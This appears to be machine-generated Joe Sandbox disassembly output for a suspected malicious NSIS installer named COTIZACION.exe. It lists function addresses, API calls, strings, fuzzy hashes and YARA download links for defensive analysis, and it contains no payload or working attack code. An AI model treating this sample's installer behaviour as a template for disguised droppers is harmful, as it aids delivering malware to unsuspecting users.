Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\Desktop$C:\Users\user\Desktop\COTIZACION.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-366774273
Opcode ID: 89db09ba3d9e86f9c075612005f46009679623d63feb2a5cce1b372a96914bed
Instruction ID: 8295773d5102a3db2c924d587f32f5b95c2827ef7f93a52122a4f4d2b553c90e
Opcode Fuzzy Hash: 89db09ba3d9e86f9c075612005f46009679623d63feb2a5cce1b372a96914bed
Instruction Fuzzy Hash: B951D371904300AFD720AF25DD81B1B7AA8BB8471AF10453FF955B62E1CB3D8E548B6E

Function 00405E98 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405FC2

Part of subcall function 00406AF8: lstrcpynW.KERNEL32(?,?,00000400,0040384F,007A7540,NSIS Error), ref: 00406B05

Part of subcall function 00406D1B: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406D90
Part of subcall function 00406D1B: CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
Part of subcall function 00406D1B: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DA4
Part of subcall function 00406D1B: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DBC

GetWindowsDirectoryW.KERNEL32(Call,00000400,Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,?,?,?), ref: 00405FD5
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,?,?,?), ref: 0040604E
lstrlenW.KERNEL32(Call,Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,?,?,?), ref: 004060A8

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll, xrefs: 00405EF3
Call, xrefs: 00405EBA, 00405F88, 00405FAC, 00405FC1, 00405FD4, 00405FE7, 00406014, 0040604D, 00406054, 00406070, 00406083, 00406091, 004060A1, 004060A7, 004060CE, 004060EA
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406048
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405F8D

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4187626192-136800608
Opcode ID: 90908ed2b1fff3d7c45b9d6734c0443e5caff99512698a5aebad6b02f2870112
Instruction ID: e5fb9ae88836c379eadb94168964a2c41ebb3bf79b6cd8bfde1838e31315b013
Opcode Fuzzy Hash: 90908ed2b1fff3d7c45b9d6734c0443e5caff99512698a5aebad6b02f2870112
Instruction Fuzzy Hash: 0E6115716442159BDB24AB288C40A3B76A4EF99350F11853FF982F72D1EB3CC9258B5E

Function 00405D18 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,?,00000000,?,?), ref: 00405D4A
lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,?,00000000,?,?), ref: 00405D5C
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,?,00000000,?,?), ref: 00405D77
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll), ref: 00405D8F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405DB6
SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DD1
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405DDE

Part of subcall function 00405E98: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,?,?,?), ref: 0040604E

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll, xrefs: 00405D35, 00405D43, 00405D49, 00405D71, 00405D76, 00405D7E, 00405D88

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$TextWindow
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll
API String ID: 1759915248-3880643226
Opcode ID: b3a3bffc108da763a0d5830401e4444f920c759f89e848b3eba3191ccd966a9d
Instruction ID: eb00d4876afd5f62942919e2a46038e7a2417e41af97232aca8a81e0ace8ac77
Opcode Fuzzy Hash: b3a3bffc108da763a0d5830401e4444f920c759f89e848b3eba3191ccd966a9d
Instruction Fuzzy Hash: C7212672A056206BC310AF598D44E5BBBDCFF95310F04443FF988B3291C7B89D018BAA

Function 00403148 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004031B6
GetTickCount.KERNEL32 ref: 00403248
MulDiv.KERNEL32(?,00000064,?), ref: 00403278
wsprintfW.USER32 ref: 00403289

Part of subcall function 00403131: SetFilePointer.KERNELBASE(?,00000000,00000000,004035B5,?), ref: 0040313F

Strings

<Py, xrefs: 0040321B
... %d%%, xrefs: 00403283

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: CountTick$FilePointerwsprintf
String ID: ... %d%%$<Py
API String ID: 999035486-2352372732
Opcode ID: de52eb9ac16236f3fca6093ce857b7e1a1bc104f410f064c541848c7e306c8f4
Instruction ID: cddf24be581f0244f3449d1f5e961e9f445dbb2a95aafc889e314ca9340d81f7
Opcode Fuzzy Hash: de52eb9ac16236f3fca6093ce857b7e1a1bc104f410f064c541848c7e306c8f4
Instruction Fuzzy Hash: FD519F702083028BD710DF29DE85B2B7BE8AB84756F14093EFC54F22D1DB38DA048B5A

Function 0040617C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
wsprintfW.USER32 ref: 004061CF
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3

Strings

%s%S.dll, xrefs: 004061C9
\, xrefs: 004061A4
UXTHEME, xrefs: 0040618B

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
Instruction ID: a4cd9840ceca3203298f5f6208b2692cfaa140b5cc7ad0efff7adaa08ca45ff7
Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
Instruction Fuzzy Hash: CEF0BB7190161457D710B764DE0DB9A367CEB10304F54447A6646F62C1EB7C9A54C79C

Function 00406A34 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406A50
GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403CB2,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406A6B

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A3D
a, xrefs: 00406A49
n, xrefs: 00406A42
C:\Users\user\AppData\Local\Temp\, xrefs: 00406A39

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
API String ID: 1716503409-3489432095
Opcode ID: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
Instruction ID: 42be8ac81fa96e2418e52fe12c64c606f0e7da939330081f96b146de974569e0
Opcode Fuzzy Hash: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
Instruction Fuzzy Hash: EDF05E72700208BBEB149F85DD09BEF7769EF91B10F15807BE945BA180E6B05E9487A4

Function 004068C4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
GetProcAddress.KERNEL32(00000000), ref: 004068EE

Part of subcall function 0040617C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
Part of subcall function 0040617C: wsprintfW.USER32 ref: 004061CF
Part of subcall function 0040617C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 004068C5
UXTHEME, xrefs: 004068C4, 004068D1, 004068DC

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
API String ID: 2547128583-890815371
Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
Instruction ID: cca553acf36b1fe6902a80dcde2ed56f94a70d609a724c5234c7087bacb34bc4
Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
Instruction Fuzzy Hash: FDD02B331022159BC7002F22AE0894F776DEF66350701403BF541F2230EB38C82295FD

Function 00405E1C Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 00405E5D
GetLastError.KERNEL32 ref: 00405E67
SetFileSecurityW.ADVAPI32(?,80000007,?), ref: 00405E80
GetLastError.KERNEL32 ref: 00405E8E

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
Instruction ID: c5276d81fc3706eb17032c67a8bd40c2bbffd7631990a047acf891ba11bc5777
Opcode Fuzzy Hash: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
Instruction Fuzzy Hash: 39011A74D00609DFDB109FA0DA44BAE7BB4EB04315F10443AD949F6190D77886488F99

Function 00406955 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,?,?,?,?,Call,00000000,00000000,00000002,00405F9C), ref: 0040699C
RegCloseKey.KERNELBASE(?), ref: 004069A7

Strings

Call, xrefs: 0040695A

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 76b6ba2905dba72e0879de14cdf3f2fb9278ac09f103d2f047db2673b29e615b
Instruction ID: 1ae9e56a03760404e91669882a34a602e62d6bc2f034f3a498143100352ea1f7
Opcode Fuzzy Hash: 76b6ba2905dba72e0879de14cdf3f2fb9278ac09f103d2f047db2673b29e615b
Instruction Fuzzy Hash: F6015EB652010AABDF218FA4DD06EEF7BA8EF44354F110136F905E2260E334DA64DB94

Function 00405DFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00405E04
GetLastError.KERNEL32 ref: 00405E0E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405DFC

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1375471231-297319885
Opcode ID: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
Instruction ID: 1d45a01f7acee8fa23fe776dff3dd1d011af88d7d8ca29917c3c3e776444c4f1
Opcode Fuzzy Hash: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
Instruction Fuzzy Hash: 74C012326000309BC7602B65AE08A87BE94EB506A13068239B988E2220DA308C54CAE8

Function 7002167A Relevance: 4.6, APIs: 3, Instructions: 123COMMON

Download Yara Rule

APIs

Part of subcall function 70022351: GlobalFree.KERNEL32(?), ref: 70022A44
Part of subcall function 70022351: GlobalFree.KERNEL32(?), ref: 70022A4A
Part of subcall function 70022351: GlobalFree.KERNEL32(?), ref: 70022A50

GlobalFree.KERNEL32(00000000), ref: 70021738
FreeLibrary.KERNEL32(?), ref: 700217C3
GlobalFree.KERNEL32(00000000), ref: 700217E9

Part of subcall function 70021FCB: GlobalAlloc.KERNEL32(00000040,?), ref: 70021FFA

Part of subcall function 700217F7: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,70021708,00000000), ref: 7002189A

Part of subcall function 70021F1E: wsprintfW.USER32 ref: 70021F51

Memory Dump Source

Source File: 00000000.00000002.2037043601.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.2036962421.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
